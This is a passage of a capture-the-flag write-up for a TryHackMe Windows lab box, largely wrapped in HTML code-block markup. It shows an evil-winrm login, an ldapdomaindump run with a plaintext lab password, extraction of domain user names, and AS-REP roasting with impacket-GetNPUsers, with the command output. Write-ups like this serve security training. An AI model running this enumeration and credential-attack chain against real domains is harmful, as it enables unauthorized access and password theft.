C:\\Users\\automate\\Documents&gt; \n\" style=\"color:#babed8;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki material-theme-ocean\" style=\"background-color: #0F111A\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #FFCB6B\">\u250c\u2500\u2500(ishsome\u327fkali<\/span><span style=\"color: #BABED8\">)-<\/span><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">~\/THM\/Windows-Boxes\/Reset<\/span><span style=\"color: #89DDFF\">]<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">\u2514\u2500$<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">evil-winrm<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">-i<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">10.10<\/span><span style=\"color: #C3E88D\">.52.38<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">-u<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">AUTOMATE<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Enter<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Password:<\/span><span style=\"color: #BABED8\"> <\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">                                        <\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Evil-WinRM<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">shell<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">v3.5<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">                                        <\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Warning:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Remote<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">path<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">completions<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">is<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">disabled<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">due<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">to<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">ruby<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">limitation:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">quoting_detection_proc<\/span><span style=\"color: #89DDFF\">()<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">function<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">is<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">unimplemented<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">on<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">this<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">machine<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">                                        <\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Data:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">For<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">more<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">information,<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">check<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Evil-WinRM<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">GitHub:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">https:\/\/github.com\/Hackplayers\/evil-winrm#Remote-path-completion<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">                                        <\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Info:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Establishing<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">connection<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">to<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">remote<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">endpoint<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">*<\/span><span style=\"color: #BABED8\">Evil-WinRM<\/span><span style=\"color: #89DDFF\">*<\/span><span style=\"color: #BABED8\"> PS C:\\Users\\automate\\Documents<\/span><span style=\"color: #89DDFF\">&gt;<\/span><span style=\"color: #BABED8\"> <\/span><\/span>\n<span class=\"line\"><\/span><\/code><\/pre><\/div>\n\n\n\n<div style=\"height:18px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#0F111A\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" data-code=\"*Evil-WinRM* PS C:\\Users\\automate\\Desktop&gt; dir\n\n\n    Directory: C:\\Users\\automate\\Desktop\n\n\nMode                LastWriteTime         Length Name\n----                -------------         ------ ----\n-a----        6\/21\/2016   3:36 PM            527 EC2 Feedback.website\n-a----        6\/21\/2016   3:36 PM            554 EC2 Microsoft Windows Guide.website\n-a----        6\/16\/2023   4:35 PM             31 user.txt\n\n\n*Evil-WinRM* PS C:\\Users\\automate\\Desktop&gt; type user.txt\nTHM{AUTOMATION_XXX_XXX_XXX}\n*Evil-WinRM* PS C:\\Users\\automate\\Desktop&gt; \n\" style=\"color:#babed8;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki material-theme-ocean\" style=\"background-color: #0F111A\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #89DDFF\">*<\/span><span style=\"color: #BABED8\">Evil<\/span><span style=\"color: #89DDFF\">-<\/span><span style=\"color: #BABED8\">WinRM<\/span><span style=\"color: #89DDFF\">*<\/span><span style=\"color: #BABED8\"> PS C:\\Users\\automate\\Desktop<\/span><span style=\"color: #89DDFF\">&gt;<\/span><span style=\"color: #BABED8\"> dir<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">    Directory: C:\\Users\\automate\\Desktop<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">Mode                LastWriteTime         Length Name<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">----<\/span><span style=\"color: #BABED8\">                <\/span><span style=\"color: #89DDFF\">-------------<\/span><span style=\"color: #BABED8\">         <\/span><span style=\"color: #89DDFF\">------<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #89DDFF\">----<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">-<\/span><span style=\"color: #BABED8\">a<\/span><span style=\"color: #89DDFF\">----<\/span><span style=\"color: #BABED8\">        <\/span><span style=\"color: #F78C6C\">6<\/span><span style=\"color: #89DDFF\">\/<\/span><span style=\"color: #F78C6C\">21<\/span><span style=\"color: #89DDFF\">\/<\/span><span style=\"color: #F78C6C\">2016<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #F78C6C\">3<\/span><span style=\"color: #BABED8\">:<\/span><span style=\"color: #F78C6C\">36<\/span><span style=\"color: #BABED8\"> PM            <\/span><span style=\"color: #F78C6C\">527<\/span><span style=\"color: #BABED8\"> EC2 Feedback.website<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">-<\/span><span style=\"color: #BABED8\">a<\/span><span style=\"color: #89DDFF\">----<\/span><span style=\"color: #BABED8\">        <\/span><span style=\"color: #F78C6C\">6<\/span><span style=\"color: #89DDFF\">\/<\/span><span style=\"color: #F78C6C\">21<\/span><span style=\"color: #89DDFF\">\/<\/span><span style=\"color: #F78C6C\">2016<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #F78C6C\">3<\/span><span style=\"color: #BABED8\">:<\/span><span style=\"color: #F78C6C\">36<\/span><span style=\"color: #BABED8\"> PM            <\/span><span style=\"color: #F78C6C\">554<\/span><span style=\"color: #BABED8\"> EC2 Microsoft Windows Guide.website<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">-<\/span><span style=\"color: #BABED8\">a<\/span><span style=\"color: #89DDFF\">----<\/span><span style=\"color: #BABED8\">        <\/span><span style=\"color: #F78C6C\">6<\/span><span style=\"color: #89DDFF\">\/<\/span><span style=\"color: #F78C6C\">16<\/span><span style=\"color: #89DDFF\">\/<\/span><span style=\"color: #F78C6C\">2023<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #F78C6C\">4<\/span><span style=\"color: #BABED8\">:<\/span><span style=\"color: #F78C6C\">35<\/span><span style=\"color: #BABED8\"> PM             <\/span><span style=\"color: #F78C6C\">31<\/span><span style=\"color: #BABED8\"> user.txt<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">*<\/span><span style=\"color: #BABED8\">Evil<\/span><span style=\"color: #89DDFF\">-<\/span><span style=\"color: #BABED8\">WinRM<\/span><span style=\"color: #89DDFF\">*<\/span><span style=\"color: #BABED8\"> PS C:\\Users\\automate\\Desktop<\/span><span style=\"color: #89DDFF\">&gt;<\/span><span style=\"color: #BABED8\"> type user.txt<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">THM<\/span><span style=\"color: #89DDFF\">{<\/span><span style=\"color: #BABED8\">AUTOMATION_XXX_XXX_XXX<\/span><span style=\"color: #89DDFF\">}<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">*<\/span><span style=\"color: #BABED8\">Evil<\/span><span style=\"color: #89DDFF\">-<\/span><span style=\"color: #BABED8\">WinRM<\/span><span style=\"color: #89DDFF\">*<\/span><span style=\"color: #BABED8\"> PS C:\\Users\\automate\\Desktop<\/span><span style=\"color: #89DDFF\">&gt;<\/span><span style=\"color: #BABED8\"> <\/span><\/span>\n<span class=\"line\"><\/span><\/code><\/pre><\/div>\n\n\n\n<div style=\"height:17px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h3 class=\"wp-block-heading\"><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">Enumerating Domain<\/mark><\/h3>\n\n\n\n<p>Since we have a set of credentials for a domain user, we can use them to enumerate the domain using LDAP tools. We can use <strong><em><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">ldapdomaindump <\/mark><\/em><\/strong>to dump the below information from the domain which includes, domain users, groups, computers, etc.,<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#0F111A\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" data-code=\"\u250c\u2500\u2500(ishsome\u327fkali)-[~\/THM\/Windows-Boxes\/Reset\/LDAP]\n\u2514\u2500$ ldapdomaindump 10.10.52.38 -u 'thm.corp\\AUTOMATE' -p 'Passw0rd1'                                      \n[*] Connecting to host...\n[*] Binding to host\n[+] Bind OK\n[*] Starting domain dump\n[+] Domain dump finished\n                                                                                                             \n\u250c\u2500\u2500(ishsome\u327fkali)-[~\/THM\/Windows-Boxes\/Reset\/LDAP]\n\u2514\u2500$ ls                                                              \ndomain_computers.grep        domain_groups.html  domain_trusts.grep  domain_users.json\ndomain_computers.html        domain_groups.json  domain_trusts.html  domain_users_by_group.html\ndomain_computers.json        domain_policy.grep  domain_trusts.json  \ndomain_computers_by_os.html  domain_policy.html  domain_users.grep\ndomain_groups.grep           domain_policy.json  domain_users.html\n\" style=\"color:#babed8;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki material-theme-ocean\" style=\"background-color: #0F111A\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #FFCB6B\">\u250c\u2500\u2500(ishsome\u327fkali<\/span><span style=\"color: #BABED8\">)-<\/span><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">~\/THM\/Windows-Boxes\/Reset\/LDAP<\/span><span style=\"color: #89DDFF\">]<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">\u2514\u2500$<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">ldapdomaindump<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">10.10<\/span><span style=\"color: #C3E88D\">.52.38<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">-u<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #89DDFF\">&#39;<\/span><span style=\"color: #C3E88D\">thm.corp\\AUTOMATE<\/span><span style=\"color: #89DDFF\">&#39;<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">-p<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #89DDFF\">&#39;<\/span><span style=\"color: #C3E88D\">Passw0rd1<\/span><span style=\"color: #89DDFF\">&#39;<\/span><span style=\"color: #BABED8\">                                      <\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">[*]<\/span><span style=\"color: #BABED8\"> Connecting to host...<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">[*]<\/span><span style=\"color: #BABED8\"> Binding to host<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">+<\/span><span style=\"color: #89DDFF\">]<\/span><span style=\"color: #BABED8\"> Bind OK<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">[*]<\/span><span style=\"color: #BABED8\"> Starting domain dump<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">+<\/span><span style=\"color: #89DDFF\">]<\/span><span style=\"color: #BABED8\"> Domain dump finished<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">                                                                                                             <\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">\u250c\u2500\u2500(ishsome\u327fkali<\/span><span style=\"color: #BABED8\">)-<\/span><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">~\/THM\/Windows-Boxes\/Reset\/LDAP<\/span><span style=\"color: #89DDFF\">]<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">\u2514\u2500$<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">ls<\/span><span style=\"color: #BABED8\">                                                              <\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">domain_computers.grep<\/span><span style=\"color: #BABED8\">        <\/span><span style=\"color: #C3E88D\">domain_groups.html<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">domain_trusts.grep<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">domain_users.json<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">domain_computers.html<\/span><span style=\"color: #BABED8\">        <\/span><span style=\"color: #C3E88D\">domain_groups.json<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">domain_trusts.html<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">domain_users_by_group.html<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">domain_computers.json<\/span><span style=\"color: #BABED8\">        <\/span><span style=\"color: #C3E88D\">domain_policy.grep<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">domain_trusts.json<\/span><span style=\"color: #BABED8\">  <\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">domain_computers_by_os.html<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">domain_policy.html<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">domain_users.grep<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">domain_groups.grep<\/span><span style=\"color: #BABED8\">           <\/span><span style=\"color: #C3E88D\">domain_policy.json<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">domain_users.html<\/span><\/span>\n<span class=\"line\"><\/span><\/code><\/pre><\/div>\n\n\n\n<div style=\"height:15px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#0F111A\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" data-code=\"\u250c\u2500\u2500(ishsome\u327fkali)-[~\/THM\/Windows-Boxes\/Reset\/LDAP]\n\u2514\u2500$ jq -r '.[].attributes.sAMAccountName[0]' domain_users.json\nAUTOMATE\nRAQUEL_BENSON\nLEANN_LONG\nTREVOR_MELTON\nAUGUSTA_HAMILTON\nTED_JACOBSON\n3966486072SA\nMARION_CLAY\nMORGAN_SELLERS\n3811465497SA\nCHRISTINA_MCCORMICK\n\n..&lt;SNIPPED&gt;..\" style=\"color:#babed8;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki material-theme-ocean\" style=\"background-color: #0F111A\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #FFCB6B\">\u250c\u2500\u2500(ishsome\u327fkali<\/span><span style=\"color: #BABED8\">)-<\/span><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">~\/THM\/Windows-Boxes\/Reset\/LDAP<\/span><span style=\"color: #89DDFF\">]<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">\u2514\u2500$<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">jq<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">-r<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #89DDFF\">&#39;<\/span><span style=\"color: #C3E88D\">.[].attributes.sAMAccountName[0]<\/span><span style=\"color: #89DDFF\">&#39;<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">domain_users.json<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">AUTOMATE<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">RAQUEL_BENSON<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">LEANN_LONG<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">TREVOR_MELTON<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">AUGUSTA_HAMILTON<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">TED_JACOBSON<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">3966486072SA<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">MARION_CLAY<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">MORGAN_SELLERS<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">3811465497SA<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">CHRISTINA_MCCORMICK<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #82AAFF\">..<\/span><span style=\"color: #BABED8\">&lt;SNIPPED&gt;<\/span><span style=\"color: #82AAFF\">..<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<div style=\"height:18px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h4 class=\"wp-block-heading\"><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">ASREProast<\/mark><\/h4>\n\n\n\n<p><a href=\"https:\/\/github.com\/SecureAuthCorp\/impacket\/blob\/master\/examples\/GetNPUsers.py\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">GetNPUsers.py<\/a> can be used to retrieve domain users who do not have a &#8220;Do not require Kerberos preauthentication&#8221; set and ask for their TGTs without knowing their passwords. It is then possible to attempt to crack the session key sent along with the ticket to retrieve the user password. This attack is known as <a href=\"https:\/\/www.thehacker.recipes\/ad\/movement\/kerberos\/asreproast\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">ASREProast<\/a>.<\/p>\n\n\n\n<div style=\"height:23px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#0F111A\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" data-code=\"\u250c\u2500\u2500(ishsome\u327fkali)-[~\/THM\/Windows-Boxes\/Reset\/LDAP]\n\u2514\u2500$ impacket-GetNPUsers thm.corp\/AUTOMATE  \nImpacket v0.11.0 - Copyright 2023 Fortra\n\nPassword:\nName           MemberOf                                                      PasswordLastSet             LastLogon                   UAC      \n-------------  ------------------------------------------------------------  --------------------------  --------------------------  --------\nERNESTO_SILVA  CN=Gu-gerardway-distlist1,OU=AWS,OU=Stage,DC=thm,DC=corp      2023-07-18 11:21:44.224354  &lt;never&gt;                     0x410200 \nTABATHA_BRITT  CN=Gu-gerardway-distlist1,OU=AWS,OU=Stage,DC=thm,DC=corp      2023-08-21 15:32:59.571306  2023-08-21 15:32:05.792734  0x410200 \nLEANN_LONG     CN=CH-ecu-distlist1,OU=Groups,OU=OGC,OU=Stage,DC=thm,DC=corp  2023-07-18 11:21:44.161807  2023-06-16 07:16:11.147334  0x410200 \n\" style=\"color:#babed8;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 